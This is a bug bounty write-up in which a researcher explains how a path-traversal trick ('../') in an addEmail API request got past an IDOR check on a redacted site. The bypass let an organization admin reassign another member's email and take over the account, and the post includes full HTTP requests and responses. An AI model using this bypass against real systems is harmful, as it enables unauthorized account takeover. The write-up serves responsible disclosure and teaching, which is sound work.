Account Takeover Worth of $2500

$ whoami

I’m Jefferson Gonzales you can call me Gonz for short, 18 years old a first year college student and a part-time Security Researcher from Philippines.

Acknowledged by Nokia, UN, BBC and 20+ companies.

In this writeup I will share on how I earned $2500 for a simple IDOR bypass leads to Account Takeover.

After my graduation in Senior High School, I had a 1-month break and I used those free time to hunt and focus in a single program.

Since I cannot disclose the program’s name, I will refer to it as redacted.com in accordance with their disclosure policy.

On redacted.com you can create an Organization and add a member of that Organization, there are two options to add a member in the Organization.

First you can add a member by inviting them using their email address.

Second is adding a member without email just only member’s name and this is called a Demo user, after you added a Demo user you can edit it and add an email address to make it an actual user.

Adding member using email address

Adding member by providing name (Demo User)

After creating a Demo user, I added an email address to make it an actual user in my Organization, but when I go to my Burp Suite request history I noticed this request

POST /<organizationID>/addEmail/<DemoUserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
  "email":"attacker@email.com"
}

What will happen if I will change the <DemoUserID> to any member’s UserID inside my Organization?

The answer is

HTTP/2 403 Forbidden
Date: Tue, 15 Nov 2022 14:44:25 GMT
Content-Type: application/json
Content-Length: 76
Pragma: no-cache
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff


{
  "message":"You don't have access to this.",
}

After hours of searching for a bypass, I found a working one, the final bypassed was like this

POST /<organizationID>/addEmail/<DemoUserID>/../<UserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
  "email":"attacker@email.com"
}

Response of the request

HTTP/2 200 OK
Date: Tue, 15 Nov 2022 14:43:32 GMT
Content-Type: application/json
Content-Length: 2
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff

{
}

The email address of the associated <UserID> will be changed to the email controlled by the attacker.

Report Time:

I discovered the vulnerability around 10 p.m. and immediately filed a report, the next morning, I received a response from the team.

Bounty time

Thank you for reading this writeup.

You can contact me on

Twitter: @gonzxph

LinkedIn: @gonzxph